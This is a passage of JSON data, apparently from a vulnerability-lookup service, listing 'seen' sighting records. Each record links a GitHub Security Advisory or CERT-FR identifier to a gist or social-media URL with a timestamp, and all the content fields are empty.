"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-P25H-9Q54-FFVW", "type": "seen", "source": "https://gist.github.com/alon710/9920bd423cbf17db55a5a44ade032ef1", "content": "", "creation_timestamp": "2026-03-03T09:10:09.000000Z"}, {"uuid": "89a07a08-9a36-4fd0-9551-0149313e2c95", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xpw8-rcwv-8f8p", "type": "seen", "source": "https://gist.github.com/vietj/6cb0297e7881e7ddfbf29a64848fb7c7", "content": "", "creation_timestamp": "2026-03-03T09:26:42.000000Z"}, {"uuid": "1ea87087-9cd6-4c58-bc96-04990fe0ee56", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fp5j-j7j4-mcxc", "type": "seen", "source": "https://gist.github.com/alon710/f8f86330f5c731974b8d35df7d20cd75", "content": "", "creation_timestamp": "2026-03-12T10:10:05.000000Z"}, {"uuid": "1b01cc71-fed0-431e-a4b9-a943f676f87e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-R48F-3986-4F9C", "type": "seen", "source": "https://gist.github.com/alon710/bb04f714299eb60050b5b59f56f5af44", "content": "", "creation_timestamp": "2026-03-13T22:10:05.000000Z"}, {"uuid": "7c5bf232-7bc1-4e22-94b8-b1fe59bbe148", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-011", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/116239058462914309", "content": "", "creation_timestamp": "2026-03-16T13:21:17.314812Z"}, {"uuid": "8f575b51-e3b7-40f0-b4a8-80e65bad06d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fgvx-58p6-gjwc", "type": "seen", "source": "https://gist.github.com/alon710/f004b3a13a4436b9948f6c5897ca277d", "content": "", "creation_timestamp": "2026-03-03T09:40:09.000000Z"}, {"uuid": "cf87d1b7-cd1a-4dc4-8c11-04580523c413", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-XHW7-JHMP-J62J", "type": "seen", "source": "https://gist.github.com/alon710/4c0607fcf43c2d97141d407ceb05ca52", "content": "", "creation_timestamp": "2026-03-05T05:40:05.000000Z"}, {"uuid": "e8a3d5e2-096c-4dc8-90f8-d1d6daa4723c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hjvp-qhm6-wrh2", "type": "seen", "source": "https://gist.github.com/alon710/809209c735b2cb40b1867eb79cc22949", "content": "", "creation_timestamp": "2026-03-03T10:10:08.000000Z"}, {"uuid": "e9de8df8-be47-4cf4-9109-b1b9c6d337cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mmf8-487q-p45m", "type": "seen", "source": "https://gist.github.com/alon710/11a61b6d10f7ad9ce72bb2f275b7afb0", "content": "", "creation_timestamp": "2026-03-12T10:40:06.000000Z"}, {"uuid": "60b04c9e-eb00-490b-a604-373e3f754c0a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mfg5-7q5g-f37j", "type": "seen", "source": "https://gist.github.com/alon710/32988fdec1a4a0381f782f958eaffab2", "content": "", "creation_timestamp": "2026-03-03T10:40:09.000000Z"}, {"uuid": "5c7117b2-2de4-45c5-b251-5b30aeb56a60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-rhcg-3h8r-v6vp", "type": "seen", "source": "https://gist.github.com/alon710/795c8bcaebe4db185c8f673cfc6fa748", "content": "", "creation_timestamp": "2026-03-12T11:10:06.000000Z"}, {"uuid": "3e061b38-f9b1-4dd2-bce7-995686b3d383", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-rvv3-g6hj-g44x", "type": "seen", "source": "https://gist.github.com/alon710/d2b6ee2c399fd3a4d218a600dd6d79d1", "content": "", "creation_timestamp": "2026-03-13T23:10:06.000000Z"}, {"uuid": "0a9bf902-3a8d-42ce-931b-94043f4a534b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-qmw5-2p58-xvrc", "type": "seen", "source": "https://gist.github.com/alon710/c10cdbd73c5cbd65710762162e90e072", "content": "", "creation_timestamp": "2026-03-10T21:40:05.000000Z"}, {"uuid": "3583e908-e850-4591-918f-8b26a65c528c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-RQPP-RJJ8-7WV8", "type": "seen", "source": "https://gist.github.com/alon710/a3a38049a539db62f7e09fe32adc9717", "content": "", "creation_timestamp": "2026-03-14T05:40:05.000000Z"}, {"uuid": "af566648-9cd9-473c-a724-bd0840ef283d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-G375-5WMP-XR78", "type": "seen", "source": "https://gist.github.com/alon710/5e2f59178a3a857025038c9eaf1a265e", "content": "", "creation_timestamp": "2026-03-17T01:40:05.000000Z"}, {"uuid": "e11c60ca-37c0-4a98-bc72-da4b71fd441b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8mr6-gf9x-j8qg", "type": "seen", "source": "https://bsky.app/profile/pigondrugs.bsky.social/post/3mg6l2a242q22", "content": "", "creation_timestamp": "2026-03-03T20:07:23.571286Z"}, {"uuid": "3c87cc8f-307d-405a-8b09-f3097080a0e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-p9xr-7p9p-gpqx", "type": "seen", "source": "https://gist.github.com/alon710/b3f6f3a2d0a03d351cf9f1e0f3b1967e", "content": "", "creation_timestamp": "2026-03-10T22:40:05.000000Z"}, {"uuid": "5d8bce71-9018-4f99-bd51-e0796163923b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-w6vw-mrgv-69vf", "type": "seen", "source": "https://infosec.exchange/users/harrysintonen/statuses/116207403212934287", "content": "", "creation_timestamp": "2026-03-10T23:10:58.271454Z"}, {"uuid": "8d1bc91a-93e2-4e64-96b8-7690e2cde63f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-wg9x-qfgw-pxhj", "type": "seen", "source": "https://gist.github.com/alon710/dc81c1a2b7f709c06e63d38f24ae7eeb", "content": "", "creation_timestamp": "2026-03-10T23:10:05.000000Z"}, {"uuid": "184f5544-7448-4686-a038-99604a9b683e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-WCXR-59V9-RXR8", "type": "seen", "source": "https://gist.github.com/alon710/04f59b4b34fdad62bcd6aca02cca19bb", "content": "", "creation_timestamp": "2026-03-14T06:40:06.000000Z"}, {"uuid": "d1677816-1e2c-4de2-aefd-b638c2aaf985", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-99QW-6MR3-36QR", "type": "seen", "source": "https://gist.github.com/alon710/5134a3782e57d29ae52d47b8ef99d555", "content": "", "creation_timestamp": "2026-03-14T07:10:06.000000Z"}, {"uuid": "66cbe037-9475-43b2-9df3-67e34b0070a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "ghsa-2ch6-x3g4-7759", "type": "seen", "source": "https://bsky.app/profile/flarestart.bsky.social/post/3mg6xrczbiv2t", "content": "", "creation_timestamp": "2026-03-03T23:55:03.832179Z"}, {"uuid": "4b69e096-5591-4211-b478-715c977193b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vhj5-x93p-67JW", "type": "seen", "source": "https://gist.github.com/alon710/5acd4ab67d0640258ff9ebcad79c2937", "content": "", "creation_timestamp": "2026-03-11T00:40:06.000000Z"}, {"uuid": "02bf39bd-fd9a-4939-8cbc-949cd87d4fc0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2238-xc5r-v9hj", "type": "seen", "source": "https://gist.github.com/alon710/84a60be2b0bbf202946e3bdc9c48b627", "content": "", "creation_timestamp": "2026-03-12T18:10:06.000000Z"}, {"uuid": "b983d65b-5d24-4655-a676-d899128d20ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-r7vr-gr74-94p8", "type": "seen", "source": "https://gist.github.com/alon710/6da743df5745ff6d76be090631282892", "content": "", "creation_timestamp": "2026-03-14T07:40:05.000000Z"}, {"uuid": "c0765f6c-98d3-43a9-8502-3c5f0f89659a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "ghsa-gq83-8q7q-9hfx", "type": "seen", "source": "https://bsky.app/profile/flarestart.bsky.social/post/3mg6zpvp6fo2n", "content": "", "creation_timestamp": "2026-03-04T00:30:03.628088Z"}, {"uuid": "d0774bf1-67a3-47ae-8f1f-15afb67959fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-92gp-jfgx-9qpv", "type": "seen", "source": "https://gist.github.com/alon710/81922f2048444626dde8917d1920b821", "content": "", "creation_timestamp": "2026-03-12T19:10:05.000000Z"}, {"uuid": "4fe2a2d0-67e1-4b1a-9942-97c48f21aee0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-f8r2-vg7x-gh8m", "type": "seen", "source": "https://gist.github.com/alon710/fa1a2b38eaeb0cbf7ed3c7205c4f47db", "content": "", "creation_timestamp": "2026-03-14T09:40:05.000000Z"}, {"uuid": "9634dbeb-f633-4006-bb4b-b42172406e36", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-J443-WCQQ-XPRH", "type": "seen", "source": "https://gist.github.com/alon710/beef884f648182154845d222b09c6d82", "content": "", "creation_timestamp": "2026-03-11T04:40:05.000000Z"}, {"uuid": "13cb90cd-9d0e-4668-bc6d-76c994261f28", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-78cv-mqj4-43f7", "type": "seen", "source": "https://gist.github.com/alon710/d5c9749169bfe3ab317a60240bc7470c", "content": "", "creation_timestamp": "2026-03-12T00:10:06.000000Z"}, {"uuid": "44e393b8-f509-4c67-920f-85e11483f6ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gg5m-55jj-8m5g", "type": "seen", "source": "https://gist.github.com/alon710/c7a26a3aa4c5be8cf9da1316183bceec", "content": "", "creation_timestamp": "2026-03-13T09:40:05.000000Z"}, {"uuid": "cee4b0a8-f734-46c7-bc94-3d2fe77ca79b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-x6fw-778m-wr9v", "type": "seen", "source": "https://gist.github.com/alon710/dd4d266e9eb897cccd36bc7bc2690585", "content": "", "creation_timestamp": "2026-03-09T18:10:05.000000Z"}, {"uuid": "b78a9701-4610-4256-b55f-980557d4e0f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-92wx-p669-8gr9", "type": "seen", "source": "https://gist.github.com/ttuurrnn/1365a4a9b1c3d5826a3a9bbe111f26b8", "content": "", "creation_timestamp": "2026-03-12T00:27:55.000000Z"}, {"uuid": "66e8acb7-a74f-46c5-b918-b3989bfbc071", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3q28-qjrv-qr39", "type": "seen", "source": "https://gist.github.com/alon710/511ae37ea808f7a384da02de9d2e30d1", "content": "", "creation_timestamp": "2026-03-13T10:10:06.000000Z"}, {"uuid": "8d5ad7a1-f3be-441f-815b-7f7f0b6f62a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-q5q9-2rhp-33qw", "type": "seen", "source": "https://gist.github.com/alon710/b35bd22da36673db291bcd39a01cd730", "content": "", "creation_timestamp": "2026-03-09T18:40:05.000000Z"}, {"uuid": "82205b7b-7119-4999-9a19-5fe2879fa130", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xg2q-62g2-cvcm", "type": "seen", "source": "https://gist.github.com/alon710/be322fbd1c6dbc2c5db3537c606b3df9", "content": "", "creation_timestamp": "2026-03-13T10:40:05.000000Z"}, {"uuid": "96caff16-3f6b-4580-8d8d-5bce5522d9d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vffh-c9pq-4crh", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3mhinb7ryye2y", "content": "", "creation_timestamp": "2026-03-20T13:38:54.755221Z"}, {"uuid": "d94cfee8-67d4-48c2-8813-f241c2b776fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ALE-003", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/116261696202353385", "content": "", "creation_timestamp": "2026-03-20T13:18:20.615699Z"}, {"uuid": "853716b9-cfbf-484e-8093-5d95b243a53f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5crp-9r3c-p9vr", "type": "seen", "source": "https://gist.github.com/LeggoTM/c12250d794f29d335f20ac86a1fc69aa", "content": "", "creation_timestamp": "2026-04-13T06:47:17.000000Z"}, {"uuid": "88e9ba7a-d81a-482b-a83a-3bfff108bbe7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fvcv-3m26-pcqx", "type": "seen", "source": "https://bsky.app/profile/zenn.dev.web.brid.gy/post/3mjefqtpeu6j2", "content": "", "creation_timestamp": "2026-04-13T08:07:03.772371Z"}, {"uuid": "2c6384e1-182e-4a57-882d-d70aedd82ded", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-016", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/116396701141864601", "content": "", "creation_timestamp": "2026-04-13T09:31:53.820028Z"}, {"uuid": "bbaeedab-61f1-4209-877e-f19273aba2c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hv4r-mvr4-25vw", "type": "seen", "source": "https://bsky.app/profile/4sterisk.mi.tomadoi.com.ap.brid.gy/post/3mk2kzufsa2l2", "content": "", "creation_timestamp": "2026-04-22T03:37:22.076233Z"}, {"uuid": "93ef03c0-bbb6-4b2e-a55a-cb9e9a3b0ec6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-RHF7-WVW3-VJVM", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3mk7esc4wlld2", "content": "", "creation_timestamp": "2026-04-24T01:29:03.777754Z"}, {"uuid": "33d5d884-2240-4fd9-b3cd-ca9752756f37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5r37-qpwq-2jhh", "type": "seen", "source": "https://bsky.app/profile/Whiskeyomega.cupoftea.social.ap.brid.gy/post/3mjklbnicupa2", "content": "", "creation_timestamp": "2026-04-15T18:59:08.497229Z"}, {"uuid": "db656ff9-b352-46c3-94c6-1e4dfe8dc341", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-9952-gv64-x94c", "type": "seen", "source": "https://gist.github.com/alon710/fbd628716d85ae12bcc3cccd9c31c1c9", "content": "", "creation_timestamp": "2026-02-17T09:50:49.000000Z"}, {"uuid": "d7046e8e-a872-4b8c-aa59-18a4c3363b49", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hr7j-63v7-vj7g", "type": "seen", "source": "https://gist.github.com/alon710/272cb414eb96f2e41f70f56e070bb918", "content": "", "creation_timestamp": "2026-02-17T17:40:31.000000Z"}, {"uuid": "a9a6854c-b7b0-4e92-ac45-b2a097752c88", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-XC7W-V5X6-CC87", "type": "seen", "source": "https://gist.github.com/alon710/00b24a97d5bf115dab462b009f078bb9", "content": "", "creation_timestamp": "2026-02-17T18:10:30.000000Z"}, {"uuid": "53d8cf4f-c7bb-4bb3-8399-06c35b218b24", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9f5h-mmq6-2x78", "type": "seen", "source": "https://gist.github.com/alon710/f17e6e93e24b62efe6529ae7f171eec3", "content": "", "creation_timestamp": "2026-02-09T23:10:05.000000Z"}, {"uuid": "a700f041-7da5-4f1a-b465-044f3456fba0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2453-mppf-46cj", "type": "seen", "source": "https://gist.github.com/alon710/05c03b478ac40a36955b23403707c5ec", "content": "", "creation_timestamp": "2026-02-09T23:40:05.000000Z"}, {"uuid": "b8ddbcaf-3218-49d1-a1b2-e8378d53f6d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2026-ACT-006", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3megmvo2ddj22", "content": "", "creation_timestamp": "2026-02-09T14:11:32.712513Z"}, {"uuid": "487e7838-2e65-4289-b21e-a31cf5433d2d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2026-ACT-006", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/116041075350640073", "content": "", "creation_timestamp": "2026-02-09T14:11:36.888576Z"}, {"uuid": "ea4cca2d-3762-4ba9-b8c9-de64e9403a12", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m5r2-8p9x-hp5m", "type": "seen", "source": "https://gist.github.com/alon710/3866d76e7708105d7c825d24473e3e94", "content": "", "creation_timestamp": "2026-02-10T00:10:05.000000Z"}, {"uuid": "85262ccc-d2f2-424d-bca9-4163e2a18037", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rgmp-4873-r683", "type": "seen", "source": "https://gist.github.com/alon710/3b833c17cc05e7f2db36c04118829c32", "content": "", "creation_timestamp": "2026-01-24T21:26:58.000000Z"}, {"uuid": "4e342d6a-694c-4760-9d42-738d23dbd2de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9c48-w39g-hm26", "type": "seen", "source": "https://gist.github.com/alon710/7ff8ff77e1550d03234add83f2deb924", "content": "", "creation_timestamp": "2026-01-24T21:26:52.000000Z"}, {"uuid": "bbab7250-5004-44f0-a23c-d88f11cbd62c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5F29-2333-H9C7", "type": "seen", "source": "https://gist.github.com/alon710/cda39831d26cf6c01e3af2c90963a019", "content": "", "creation_timestamp": "2026-01-24T21:26:49.000000Z"}, {"uuid": "b11300f1-01d2-487d-aeee-70883db6ae7b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-ch7p-mpv4-4vg4", "type": "seen", "source": "https://gist.github.com/alon710/8ba7ed49e46933dff872240af51e2b2d", "content": "", "creation_timestamp": "2026-01-24T21:26:48.000000Z"}, {"uuid": "e42c6fcf-2451-4475-8546-33f66ee8402d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-36hm-qxxp-pg3m", "type": "seen", "source": "https://gist.github.com/alon710/a615c1b49b51d9f9754097e628bd25c5", "content": "", "creation_timestamp": "2026-01-24T21:26:46.000000Z"}, {"uuid": "edb21e97-7568-4041-aa14-b95d65118e1f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jf52-3f2h-h9j5", "type": "seen", "source": "https://gist.github.com/alon710/b58086582ecd8cde824806d1ad4c5b1c", "content": "", "creation_timestamp": "2026-01-24T21:26:43.000000Z"}, {"uuid": "1c65bd66-4421-4de5-abe0-4335e93d6ff9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PCWC-3FW3-8CQV", "type": "seen", "source": "https://gist.github.com/alon710/580fb50b89132ba6d323d985543b1e61", "content": "", "creation_timestamp": "2026-01-24T21:26:07.000000Z"}, {"uuid": "44b20572-e4ad-43d9-8c22-6ccb50be9340", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5264-m964-7pg9", "type": "seen", "source": "https://gist.github.com/alon710/dada607d9cf26924b64f5cc8b7be9433", "content": "", "creation_timestamp": "2026-01-30T16:30:50.000000Z"}, {"uuid": "5e40c577-d2dd-4532-9b9e-bab807dcdaf2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mc68-q9jw-2h3v", "type": "seen", "source": "https://gist.github.com/alon710/da71e1b21c019ed67ddac780407f1bdf", "content": "", "creation_timestamp": "2026-02-03T08:50:51.000000Z"}, {"uuid": "09f4481d-2cf1-4f88-b051-07f871a9ac42", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-28qq-5f47-r5x2", "type": "seen", "source": "https://infosec.exchange/users/DarkWebInformer/statuses/115985606322071908", "content": "", "creation_timestamp": "2026-01-30T19:05:02.235007Z"}, {"uuid": "c7099978-897a-4c58-acbc-25179eb15297", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rjrp-m2jw-pv9c", "type": "seen", "source": "https://gist.github.com/alon710/34c4fe609720fe12fdd6c57b2bf9fe8f", "content": "", "creation_timestamp": "2026-02-03T09:30:51.000000Z"}, {"uuid": "12390c24-b83f-4e9b-bc82-fba20c535574", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7j88-353p-36rg", "type": "seen", "source": "https://gist.github.com/Tomer-PL/e8c69d23e16d16ee5c53a609f0f0f5c3", "content": "", "creation_timestamp": "2026-02-01T12:00:24.000000Z"}, {"uuid": "6b55f43b-5186-4b45-bb7e-9b507d940c1e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jp2f-99h9-7vjv", "type": "seen", "source": "https://gist.github.com/YLChen-007/0604d17e830a44b5cb80bbcb021741d3", "content": "", "creation_timestamp": "2026-02-01T12:54:59.000000Z"}, {"uuid": "225f38e6-a336-4a9a-8dbe-32d93014f3da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gjcm-rqq5-f2gw", "type": "seen", "source": "https://gist.github.com/YLChen-007/68f2fd775d41f4258a92d285957455d0", "content": "", "creation_timestamp": "2026-02-01T12:54:38.000000Z"}, {"uuid": "ed5315b5-04a9-42e8-a255-dfa1146adc8c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr83-92vc-gqcq", "type": "seen", "source": "https://gist.github.com/YLChen-007/e6ea2695c26156e31c697778fdbb250f", "content": "", "creation_timestamp": "2026-02-01T12:55:44.000000Z"}, {"uuid": "2ebdd1fa-1406-4def-a084-09d570b57798", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-ccg3-fx4m-f8g7", "type": "seen", "source": "https://gist.github.com/YLChen-007/fbcc5ccada1a242a86ef9f59c8cc8ec5", "content": "", "creation_timestamp": "2026-02-01T12:55:23.000000Z"}, {"uuid": "a970fcb1-ca1f-49ab-8628-b99cafdc18f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9965-vmph-33xx", "type": "seen", "source": "https://gist.github.com/decsecre583/8166eb37c8565c6548513eec772b47e7", "content": "", "creation_timestamp": "2026-02-05T18:53:18.000000Z"}, {"uuid": "8a4a4b72-9089-4613-b748-7d47506fdee0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-36q9-v7p3-vj6v", "type": "seen", "source": "https://bsky.app/profile/lyc8503.nya.one.ap.brid.gy/post/3mgaujmkgwy72", "content": "", 